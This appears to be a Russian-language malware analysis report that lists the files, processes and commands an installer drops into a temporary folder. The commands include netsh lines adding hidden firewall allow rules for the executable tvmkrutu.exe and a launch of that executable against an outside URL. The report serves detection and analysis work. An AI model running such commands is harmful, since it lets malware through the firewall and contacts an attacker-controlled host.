Техническая информация
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=tvmkrutu dir=in action=allow program="%TEMP%\nskE53.tmp\tvmkrutu.exe" enable=yes profile=public,private
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=tvmkrutu dir=out action=allow program="%TEMP%\nskE53.tmp\tvmkrutu.exe" enable=yes profile=public,private
- %WINDIR%\syswow64\explorer.exe
- %TEMP%\nske53.tmp\nsexec.dll
- %TEMP%\nske53.tmp\dotnetfx45_full_setup.exe
- %TEMP%\nske53.tmp\tvmkrutu.exe
- %TEMP%\nske53.tmp\tvmkrutu.exe.config
- %TEMP%\nske53.tmp\selfdel.dll
- %TEMP%\nske53.tmp\dotnetfx45_full_setup.exe
- %TEMP%\nske53.tmp\nsexec.dll
- %TEMP%\nske53.tmp\selfdel.dll
- %TEMP%\nske53.tmp\tvmkrutu.exe
- %TEMP%\nske53.tmp\tvmkrutu.exe.config
- '%TEMP%\nske53.tmp\tvmkrutu.exe' "http://www.spartansziad.click" "%TEMP%\nskE53.tmp\7772"
- '%WINDIR%\syswow64\explorer.exe'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=tvmkrutu dir=out action=allow program="%TEMP%\nskE53.tmp\tvmkrutu.exe" enable=yes profile=public,private (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=tvmkrutu dir=in action=allow program="%TEMP%\nskE53.tmp\tvmkrutu.exe" enable=yes profile=public,private (со скрытым окном)